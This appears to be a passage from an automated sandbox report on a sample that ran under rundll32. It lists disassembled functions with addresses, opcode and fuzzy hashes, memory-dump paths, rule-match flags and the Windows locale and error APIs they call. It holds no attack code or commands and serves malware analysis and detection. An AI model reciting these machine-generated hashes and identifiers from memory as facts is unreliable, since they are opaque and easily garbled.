                                                • Instruction ID: 0c934186df795393a3ed1fd3b1a1bed84aa62fe45b8790286fab03f6998e2a4e
                                                • Opcode Fuzzy Hash: 65a96f57a5017fce4e3eed641b1a20551ed177edf3e3d2307ebf935a40999b78
                                                • Instruction Fuzzy Hash: CA03ACB8E052698FCB69CF58C890BD9BBB1BF89304F1081DAD949A7355D730AE81CF54
                                                Function 7F2C8E10 Relevance: 3.9, Strings: 2, Instructions: 1362COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: e$e
                                                • API String ID: 0-2104337576
                                                • Opcode ID: 6fdd6b00da6235c919168dbddcf24a112d36be91335dea017bab3cfdfa33684c
                                                • Instruction ID: 278b7aa7f5db258fabfeb2fb81ef104d837f1c1d6217e7e1b02b3571c4c32cdb
                                                • Opcode Fuzzy Hash: 6fdd6b00da6235c919168dbddcf24a112d36be91335dea017bab3cfdfa33684c
                                                • Instruction Fuzzy Hash: 07039DB8E052698FCB65CF58C890BD9BBB5BF49304F1082DAD849A7345D730AE81CF54
                                                Function 7F2CA800 Relevance: 3.9, Strings: 2, Instructions: 1361COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _memcpy_s
                                                • String ID: |J$D
                                                • API String ID: 2001391462-12622807
                                                • Opcode ID: 735fd2cb01e3f0fcc611233ecae5a36ac1db9c9663b6ec6fbd1f1181d82271e6
                                                • Instruction ID: 912b5eb052aedf798bf3a213c181b764e60752a5b050bf75dab9174490c8e9ef
                                                • Opcode Fuzzy Hash: 735fd2cb01e3f0fcc611233ecae5a36ac1db9c9663b6ec6fbd1f1181d82271e6
                                                • Instruction Fuzzy Hash: 71039EB4E052698FCB69CF58C890BDDBBB5BF89304F1082DAD849A7355D730AA81CF54
                                                Function 7F2F8490 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7af5a88747a61b5c2432c45f089c59faf2ec72d18a3311d2486f70010d347518
                                                • Instruction ID: e818a4eb67392897b28a445f5e140f6dfa1dde0efb8a359b816fcd4f4ad28db5
                                                • Opcode Fuzzy Hash: 7af5a88747a61b5c2432c45f089c59faf2ec72d18a3311d2486f70010d347518
                                                • Instruction Fuzzy Hash: 03F12C75E1121A9FDB14CFA8C990ADDF7F2FF48314F158269D916BB384DB30A9058B90
                                                Function 7F2E7D90 Relevance: 3.1, Strings: 2, Instructions: 625COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                • Opcode ID: 77878b8b29ce62133bbfaa3804182848cb78f9c753a73b8e8fe69d52b561d6a1
                                                • Instruction ID: 202cb11445755c10671ff2398921130ccf90e5350458e908720996a023d5d525
                                                • Opcode Fuzzy Hash: 77878b8b29ce62133bbfaa3804182848cb78f9c753a73b8e8fe69d52b561d6a1
                                                • Instruction Fuzzy Hash: 12729C78E052698FDB65CF58C894BDDBBB1BF49304F2081DAD849AB345DB30AA85CF50
                                                Function 7F2E8870 Relevance: 3.1, Strings: 2, Instructions: 625COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                • Opcode ID: c765fff462bd81fd42792263d2f6beb00a60490c21bc51dc9baad0b39c9dea8b
                                                • Instruction ID: b1a85b309cf5f3306d93ba81273a177863482757a2acc78724d4a10d2f8456e6
                                                • Opcode Fuzzy Hash: c765fff462bd81fd42792263d2f6beb00a60490c21bc51dc9baad0b39c9dea8b
                                                • Instruction Fuzzy Hash: F8729D78E052698FDB69CF58C894BDDBBB1BF49304F2081DAD849A7345DB30AA85CF50
                                                Function 7F2CC160 Relevance: 2.6, Strings: 1, Instructions: 1355COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J
                                                • API String ID: 0-1146653492
                                                • Opcode ID: b7f57ddfa32ca90ed19e38a2a3085531839c46067da1593dff947bac5db4e4c9
                                                • Instruction ID: 7c9376c1322abfc5807b8ad14e5ce8cbe47e2179ddff3820be789bafb47f6136
                                                • Opcode Fuzzy Hash: b7f57ddfa32ca90ed19e38a2a3085531839c46067da1593dff947bac5db4e4c9
                                                • Instruction Fuzzy Hash: F5039EB4E052698FCB65CF58C890BDDBBB5BF89304F1082DAD849A7355D730AA81CF54
                                                Function 7F2DD3E0 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 02361bb183e5737cc76dcbd0e5818fbef43277f212972fbab55b9100489ba803
                                                • Instruction ID: f1c3fbfd28a1121829064deffa8b905a1f162c451b1e598e6fc300fe465cbc36
                                                • Opcode Fuzzy Hash: 02361bb183e5737cc76dcbd0e5818fbef43277f212972fbab55b9100489ba803
                                                • Instruction Fuzzy Hash: C4A29B78E052698FDB68CF58C894BDDBBB1BF89304F1081DAD849A7355D730AA85CF50
                                                Function 7F30160D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,7F301608,?,?,00000008,?,?,7F310B55,00000000), ref: 7F30183A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 1776ca4c10e6997ecd8a906def4cb8471daf69afba61fb1ccef904c12c6ea16b
                                                • Instruction ID: 0813a737a280802275e79df07668fd573c2c7199889331ef7d94beaa75521859
                                                • Opcode Fuzzy Hash: 1776ca4c10e6997ecd8a906def4cb8471daf69afba61fb1ccef904c12c6ea16b
                                                • Instruction Fuzzy Hash: A0B14B35610608CFD705EF28C486B957BB6FF45364F25865DE89ACF2A1D335EA81CB40
                                                Function 7F2DA560 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: N/A
                                                • API String ID: 3758378126-2525114547
                                                • Opcode ID: c112ddd150b3d36cce0ca880303594405147d967dafa8db370ca9536af107639
                                                • Instruction ID: 27cf6a87bb162ff96d358726a961df6f219e446c0db51dc2ba819a34cfc1516a
                                                • Opcode Fuzzy Hash: c112ddd150b3d36cce0ca880303594405147d967dafa8db370ca9536af107639
                                                • Instruction Fuzzy Hash: ED527E74E052698FDB69CFA8C990BDDBBB1BF49304F1481DAD849AB345D730AA81CF50
                                                Function 7F2BDA10 Relevance: 1.7, Strings: 1, Instructions: 413COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 7f5bb84debf2c0c6a4b62b3365abf3662f4894474c628bb5708b552058819ffa
                                                • Instruction ID: 6c1013d3c6306dd99019d2835aef3e5daf2150c827f51ad43d06adf6e2635e9f
                                                • Opcode Fuzzy Hash: 7f5bb84debf2c0c6a4b62b3365abf3662f4894474c628bb5708b552058819ffa
                                                • Instruction Fuzzy Hash: 4022CE78D05269CFCB25CF98C990BDDBBB1BF49304F10819AD859AB345DB34AA85CF90
                                                Function 7F2F11CC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 7F2F11E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: c28d330ae478a6b3a355d1b6bee7eb14c5d7ef1633bfde9cb0b0afe8a4c86f11
                                                • Instruction ID: b5379689a215f573a6463790397437d0c9634b7a8a2a74909507183f6c055a5a
                                                • Opcode Fuzzy Hash: c28d330ae478a6b3a355d1b6bee7eb14c5d7ef1633bfde9cb0b0afe8a4c86f11
                                                • Instruction Fuzzy Hash: CD51B1B6A11316CBEB05CFA5C9917AEBBF9FB48330F64856EC406EB244D374A910CB50
                                                Function 7F2FD91B Relevance: 1.6, Strings: 1, Instructions: 388COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: bb69d24c76693bdf9643197ba4c9169a5cf3f398be667ef4e098eb1da213fbf5
                                                • Instruction ID: 6e5e45b93084d1b0cebdf7ad8ae6c665c9c36ec94c4aec7438d501c56aa1dc2f
                                                • Opcode Fuzzy Hash: bb69d24c76693bdf9643197ba4c9169a5cf3f398be667ef4e098eb1da213fbf5
                                                • Instruction Fuzzy Hash: 08E1A974A2070A8FCB26CFA8C590AAAF7F2FF49310B904A5DD4579B294D730B943CB55
                                                Function 7F2C2420 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 8jLTyTTW[YL]p]YH
                                                • API String ID: 0-613104928
                                                • Opcode ID: 580497cab92990d39e97eada57138bcd39ffc78c8f3bd34b3b4195888a899f16
                                                • Instruction ID: 657b362fc50624c79b0f17deced8a7f70fd01a5259bff7436efbe57eb69a1b72
                                                • Opcode Fuzzy Hash: 580497cab92990d39e97eada57138bcd39ffc78c8f3bd34b3b4195888a899f16
                                                • Instruction Fuzzy Hash: 4912AE74E05269CFDB25CF98C890BDDBBB2BF49304F10829AD859AB345D734AA85CF50
                                                Function 7F2FD228 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 47d71c86abd4b060384387815b707756b257b5c0058a3c9ae21c351dce21d932
                                                • Instruction ID: 561b648d714ff65aa3f83877bc85f7230b05f568745d0af1d71b8f9b778c2ee5
                                                • Opcode Fuzzy Hash: 47d71c86abd4b060384387815b707756b257b5c0058a3c9ae21c351dce21d932
                                                • Instruction Fuzzy Hash: C4C1CC74A2070A8FCB16CE64C490AAEFBF6FB46214F904619C893DB691C734F947CB91
                                                Function 7F30A953 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A9A7
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: bd067c0e995d621173a58cc4e38815c69ce118bb371860df59df5ac8913ba8ce
                                                • Instruction ID: 8f9f00d3f2fc20054c7ccecab7da7031c4ae4b27ce82cd22ad2f9fe3de06f565
                                                • Opcode Fuzzy Hash: bd067c0e995d621173a58cc4e38815c69ce118bb371860df59df5ac8913ba8ce
                                                • Instruction Fuzzy Hash: F021C532610306ABDF19EE69ED41EAA77AEEF04310B10407FED12D6180EB34E942DB60
                                                Function 7F2FD5B6 Relevance: 1.6, Strings: 1, Instructions: 322COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 74cec785e5ff34af4a85eeff8782ae0bb496d8b00fb5f106f9171038170c7b6c
                                                • Instruction ID: 0af04a100db335fea3340e4db637f3584c1f422dc43589b4cd6c568e1c13c5cd
                                                • Opcode Fuzzy Hash: 74cec785e5ff34af4a85eeff8782ae0bb496d8b00fb5f106f9171038170c7b6c
                                                • Instruction Fuzzy Hash: F2B1F234E2070B8BDB16CFA4C580AAEF7F5EF44600B904A1DD45BAB694DB31B947CB51
                                                Function 7F2FCEE0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: b65b4ba811ff9c7e3ca963777f37eedcdb41eaccab727729060ee70a4bdf6e6e
                                                • Instruction ID: 458119202b0edd4578ebf0a160ab983a973894aa49991510e197dc620bcbf6ea
                                                • Opcode Fuzzy Hash: b65b4ba811ff9c7e3ca963777f37eedcdb41eaccab727729060ee70a4bdf6e6e
                                                • Instruction Fuzzy Hash: 5EB1CD7092070B9BCB168E64C590AAEF7F5EF05314F904B1ED493AB6A0C739EA43CB51
                                                Function 7F30A5DA Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • EnumSystemLocalesW.KERNEL32(7F30A700,00000001,00000000,?,-00000050,?,7F30AD31,00000000,?,?,?,00000055,?), ref: 7F30A64C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 7accc1a806618903a6e7e1ebca0b317f6b8215679948f68eca1394e846842cad
                                                • Instruction ID: a27545d5aa4d9a5c36f614f4ac4e6c5072681b05a9f0829e035afd5ed50658b3
                                                • Opcode Fuzzy Hash: 7accc1a806618903a6e7e1ebca0b317f6b8215679948f68eca1394e846842cad
                                                • Instruction Fuzzy Hash: 2B11063A2007055FDB18AF39D8906AAB7A3FB84768B19442DE9974BA40D731B843CB50
                                                Function 7F30AB82 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,7F30A91C,00000000,00000000,?), ref: 7F30ABAE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID:
                                                • API String ID: 3736152602-0
                                                • Opcode ID: c93c6ca2fcbad4a4b6bf8e047f4f90f3bf798dafcff4278573e7c55ceabfd93a
                                                • Instruction ID: 845ab26bdd1afaeb2525be0de41c2219f9e8994dbd89edadeb26958595d2ed12
                                                • Opcode Fuzzy Hash: c93c6ca2fcbad4a4b6bf8e047f4f90f3bf798dafcff4278573e7c55ceabfd93a
                                                • Instruction Fuzzy Hash: 0CF08636604215ABDF18AA61D805BEA777EEB40758F15442ADC27A7140EA74FD41C6B0
                                                Function 7F30A4E8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F30A53C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale
                                                • String ID: utf8
                                                • API String ID: 3736152602-905460609
                                                • Opcode ID: 758a271b7404b613f7a6ff8a615d969389106457d475a4f0a2804e61e14174f9
                                                • Instruction ID: 395c71b07f6c5150200c980a1e995e19393fe5b70d53e1980a87b3b9e3bb3b27
                                                • Opcode Fuzzy Hash: 758a271b7404b613f7a6ff8a615d969389106457d475a4f0a2804e61e14174f9
                                                • Instruction Fuzzy Hash: CEF0F436A10205ABCB14EA79D805AFE73EDEB45321B14007EA502D7280EA34AD02C760
                                                Function 7F30A675 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • EnumSystemLocalesW.KERNEL32(7F30A953,00000001,00000001,?,-00000050,?,7F30ACF5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 7F30A6BF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 0a6dcb54a03b12a0985790b1010692e2fa5da816d2a29826c9958b48d486a19b
                                                • Instruction ID: 167540cc20b28477a1764910d9d95ac51a1ad8d5ff7d3794a904e3e1ce08640f
                                                • Opcode Fuzzy Hash: 0a6dcb54a03b12a0985790b1010692e2fa5da816d2a29826c9958b48d486a19b
                                                • Instruction Fuzzy Hash: 77F0F6363003085FDB146F35E885A7A7BE7EF80768B1A442EF9568B640D671AC42C764
                                                Function 7F303E2F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F2FF430: EnterCriticalSection.KERNEL32(-7F5F5678,?,7F300E1E,?,7F326558,0000000C,7F301108,7F3152A0), ref: 7F2FF43F
                                                • EnumSystemLocalesW.KERNEL32(7F303E22,00000001,7F326698,0000000C,7F3042AA,00000000), ref: 7F303E67
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 2231bcfa0ab0acd29a551c1aeb670b625c0b2662da595e1ddecbf3219fad7102
                                                • Instruction ID: 3a03ccd4665e0091ea2f4fcaf15c4efa282f88cc7912cf601e6cdce9ed41013a
                                                • Opcode Fuzzy Hash: 2231bcfa0ab0acd29a551c1aeb670b625c0b2662da595e1ddecbf3219fad7102
                                                • Instruction Fuzzy Hash: 72F01F7AA11300DFE700EF98D500B9DBBE1EB48332F20466AE811DB290CB795911DF80
                                                Function 7F30A58F Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • EnumSystemLocalesW.KERNEL32(7F30A4E8,00000001,00000001,?,?,7F30AD53,-00000050,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F30A5C6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 7307d397c249848195cd03285785ada2cd2a91ae28244af23cc8809541d39e6d
                                                • Instruction ID: 22946f2340c8fee24d75eaeeb4dce31735d5dbb9d2202b9c6d9eff442a9d6fb6
                                                • Opcode Fuzzy Hash: 7307d397c249848195cd03285785ada2cd2a91ae28244af23cc8809541d39e6d
                                                • Instruction Fuzzy Hash: 96F0E53A30030557DB15AF35E845B6A7FA6FFC2720B1A405AEE568F640D671A843C760
                                                Function 7F3043AE Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,7F303498,?,20001004,00000000,00000002,?,?,7F302A9A), ref: 7F3043E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 82c42c0b9bceadeb82f060c40ed243483cce6a242e4e5508fb139541059ff5d0
                                                • Instruction ID: 15c85110ebd8db777a5507112768b713309b8b5a5719d7ebc6336ee1a9080f08
                                                • Opcode Fuzzy Hash: 82c42c0b9bceadeb82f060c40ed243483cce6a242e4e5508fb139541059ff5d0
                                                • Instruction Fuzzy Hash: FBE04F3A548618BBDF023F62DC04BAE3E2AEF44762F054466FD0566150CB758E31AAA0
                                                Function 7F2DAF60 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: N/A
                                                • API String ID: 3758378126-2525114547
                                                • Opcode ID: c9204f7ad8ec266930cc12014c7c2ad600180933efc0d89aab3da3dfe3fa8395
                                                • Instruction ID: 1234d7b566c2674f5dad91d354bb39b436d468a5bd5e2203eadaa3b89c675331
                                                • Opcode Fuzzy Hash: c9204f7ad8ec266930cc12014c7c2ad600180933efc0d89aab3da3dfe3fa8395
                                                • Instruction Fuzzy Hash: 7FB1C174E042599FCB14CFA8C890AEDFBB1FF89304F248199E859AB345D735AA85CF50
                                                Function 7F2DE3A0 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID: N/A
                                                • API String ID: 3758378126-2525114547
                                                • Opcode ID: 11e560467fb17db1452f1ad7f76ae27265069d94e8d418ada426039cb6c16ce6
                                                • Instruction ID: 35242fb74c86d5f2fcb56a828c66bfc5c55b1f262e9ff650a240ce24537ab243
                                                • Opcode Fuzzy Hash: 11e560467fb17db1452f1ad7f76ae27265069d94e8d418ada426039cb6c16ce6
                                                • Instruction Fuzzy Hash: 61B1D274E04259DFCB18CF98C990AEEFBB2BF88304F148199E859AB345D735AA41CF51
                                                Function 7F2CA0A4 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: e
                                                • API String ID: 0-4024072794
                                                • Opcode ID: 02352f8507a17d444bbdf42c5d579d86689da7911503822574f87064fd18f9e1
                                                • Instruction ID: 7d0eb13013791e558782bb04fc37f30d6fc943d7af8a641c7293b9ef20547d76
                                                • Opcode Fuzzy Hash: 02352f8507a17d444bbdf42c5d579d86689da7911503822574f87064fd18f9e1
